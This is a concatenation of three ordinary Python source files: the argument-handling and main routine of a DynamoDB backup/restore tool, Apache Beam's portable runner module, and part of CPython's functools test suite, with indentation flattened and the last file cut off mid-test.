parser.add_argument("--secretKey", help="Secret key of local DynamoDB "
"[required only for local]")
parser.add_argument("-p", "--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication")
parser.add_argument("-s", "--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag")
parser.add_argument("-d", "--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]")
parser.add_argument("--dateFilterField", help="Specify a date filter field on table backup "
"e.g. 'updateAt' [optional]")
parser.add_argument("--dateFilterSince", help="Specify a since date filter on table backup"
"e.g. '1980-07-27' [optional]")
parser.add_argument("--dateFilterUntil", help="Specify a until date filter on table backup "
"e.g. '1980-08-27' [optional]")
parser.add_argument("--prefixSeparator", help="Specify a different prefix separator, "
"e.g. '.' [optional]")
parser.add_argument("--noSeparator", action='store_true',
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]")
parser.add_argument("--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]")
parser.add_argument("-t", "--tag", help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE")
parser.add_argument("--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]")
parser.add_argument("--schemaOnly", action="store_true", default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]")
parser.add_argument("--dataOnly", action="store_true", default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]")
parser.add_argument("--skipThroughputUpdate", action="store_true", default=False,
help="Skip updating throughput values across tables [optional]")
parser.add_argument("--dumpPath", help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP))
parser.add_argument("--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL "
"[optional]")
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = boto.dynamodb2.layer1.DynamoDBConnection(aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey,
host=args.host,
port=int(args.port),
is_secure=False)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = boto.dynamodb2.connect_to_region(args.region, aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn = boto.dynamodb2.connect_to_region(args.region, profile_name=args.profile)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
# Use Boto3 to find tags. Boto3 provides a paginator that makes searching ta
matching_backup_tables = get_table_name_by_tag(args.profile, args.region, args.tag)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to backup: " +
", ".join(matching_backup_tables))
try:
if args.srcTable.find("*") == -1:
do_backup(conn, args.read_capacity, tableQueue=None)
else:
do_backup(conn, args.read_capacity, matching_backup_tables)
except AttributeError:
# Didn't specify srcTable if we get here
q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(target=do_backup, args=(conn, args.readCapacity),
kwargs={"tableQueue": q})
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info("Backup of table(s) " +
", ".join(matching_backup_tables) + " completed!")
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(args.profile,
args.region,
args.bucket,
archive_file)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(args.profile, args.region, args.bucket, archive_file)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(args.profile, args.region, args.bucket, args.srcTable, args.archive)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(conn, dest_table, prefix_separator)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found " + str(len(matching_destination_tables)) +
" table(s) in DynamoDB host" + delete_str +
", ".join(matching_destination_tables))
threads = []
for table in matching_destination_tables:
t = threading.Thread(target=delete_table, args=(conn, sleep_interval, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(args.srcTable, prefix_separator)
logging.info(
"Found " + str(len(matching_restore_tables)) +
" table(s) in " + args.dumpPath + " to restore: " + ", ".join(
matching_restore_tables))
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(target=do_restore,
args=(conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity))
else:
t = threading.Thread(target=do_restore,
args=(conn, sleep_interval, source_table,
change_prefix(source_table,
args.srcTable,
dest_table,
prefix_separator),
args.writeCapacity))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Restore of table(s) " + args.srcTable + " to " +
dest_table + " completed!")
else:
delete_table(conn, sleep_interval, dest_table)
do_restore(conn, sleep_interval, args.srcTable, dest_table, args.writeCapacity)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to empty: " +
", ".join(matching_backup_tables))
threads = []
for table in matching_backup_tables:
t = threading.Thread(target=do_empty, args=(conn, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable)
if __name__ == "__main__":
main()
|
portable_runner.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import functools
import itertools
import logging
import sys
import threading
import time
import grpc
from apache_beam import version as beam_version
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability import portable_stager
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.STOPPED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None
@staticmethod
def default_docker_image():
sdk_version = beam_version.__version__
version_suffix = '.'.join([str(i) for i in sys.version_info[0:2]])
logging.warning('Make sure that locally built Python SDK docker image '
'has Python %d.%d interpreter.' % (
sys.version_info[0], sys.version_info[1]))
image = ('apachebeam/python{version_suffix}_sdk:{tag}'.format(
version_suffix=version_suffix, tag=sdk_version))
logging.info(
'Using Python SDK docker image: %s. If the image is not '
'available at local, we will try to pull from hub.docker.com'
% (image))
return image
@staticmethod
def _create_environment(options):
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(environment_type,
environment_type)
try:
environment_urn = getattr(common_urns.environments,
environment_type).urn
except AttributeError:
raise ValueError(
'Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, portable_options):
# TODO Provide a way to specify a container Docker URL
# https://issues.apache.org/jira/browse/BEAM-6328
if not self._dockerized_job_server:
self._dockerized_job_server = job_server.StopOnExitJobServer(
job_server.DockerizedJobServer())
return self._dockerized_job_server
def create_job_service(self, options):
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer()
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return server.start()
def run_pipeline(self, pipeline, options):
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment(
'use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
sdk_worker_main._get_worker_count(options),
state_cache_size=sdk_worker_main._get_state_cache_size(options),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# Some runners won't detect the GroupByKey transform unless it has no
# subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
for _, transform_proto in list(
proto_pipeline.components.transforms.items()):
if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for sub_transform in transform_proto.subtransforms:
del proto_pipeline.components.transforms[sub_transform]
del transform_proto.subtransforms[:]
# Preemptively apply combiner lifting, until all runners support it.
# Also apply sdf expansion.
# These optimizations commute and are idempotent.
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'lift_combiners,expand_sdf').lower()
if not options.view_as(StandardOptions).streaming:
flink_known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn])
if pre_optimize == 'none':
pass
elif pre_optimize == 'all':
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.annotate_stateful_dofns_as_roots,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.fix_flatten_coders,
# fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.extract_impulse_stages,
fn_api_runner_transforms.remove_data_plane_ops,
fn_api_runner_transforms.sort_stages],
known_runner_urns=flink_known_urns)
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in ('lift_combiners', 'expand_sdf'):
phases.append(getattr(fn_api_runner_transforms, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s'
% phase_name)
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=flink_known_urns,
partial=True)
job_service = self.create_job_service(options)
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=portable_options.job_server_timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc._channel._Rendezvous as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action' : 'store', 'help' : option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true'\
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
logging.debug("Runner option '%s' was already added" % option.name)
all_options = options.get_all_options(add_extra_args_fn=add_runner_options)
# TODO: Define URNs for options.
# convert int values: https://issues.apache.org/jira/browse/BEAM-5509
p_options = {'beam:option:' + k + ':v1': (str(v) if type(v) == int else v)
for k, v in all_options.items()
if v is not None}
prepare_response = job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job', pipeline=proto_pipeline,
pipeline_options=job_utils.dict_to_struct(p_options)),
timeout=portable_options.job_server_timeout)
if prepare_response.artifact_staging_endpoint.url:
stager = portable_stager.PortableStager(
grpc.insecure_channel(prepare_response.artifact_staging_endpoint.url),
prepare_response.staging_session_token)
retrieval_token, _ = stager.stage_job_resources(
options,
staging_location='')
else:
retrieval_token = None
try:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=prepare_response.preparation_id),
timeout=portable_options.job_server_timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain(
[next(state_stream)],
state_stream)
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=prepare_response.preparation_id),
timeout=portable_options.job_server_timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = job_service.Run(
beam_job_api_pb2.RunJobRequest(
preparation_id=prepare_response.preparation_id,
retrieval_token=retrieval_token))
if state_stream is None:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=run_response.job_id))
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=run_response.job_id))
return PipelineResult(job_service, run_response.job_id, message_stream,
state_stream, cleanup_callbacks)
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys
if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
class PipelineResult(runner.PipelineResult):
def __init__(self, job_service, job_id, message_stream, state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
def cancel(self):
try:
self._job_service.Cancel(beam_job_api_pb2.CancelJobRequest(
job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# Filter only messages with the "message_response" and error messages.
messages = [m.message_response for m in self._messages
if m.HasField('message_response')]
error_messages = [m for m in messages
if m.importance ==
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self):
def read_messages():
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
logging.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(
message.state_response.state))
self._messages.append(message)
t = threading.Thread(target=read_messages, name='wait_until_finish_read')
t.daemon = True
t.start()
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
t.join(10)
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
'Pipeline %s failed in state %s: %s' % (
self._job_id, self._state, self._last_error_message()))
return self._state
finally:
self._cleanup()
def _cleanup(self):
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
|
test_functools.py | import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
from weakref import proxy
import contextlib
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
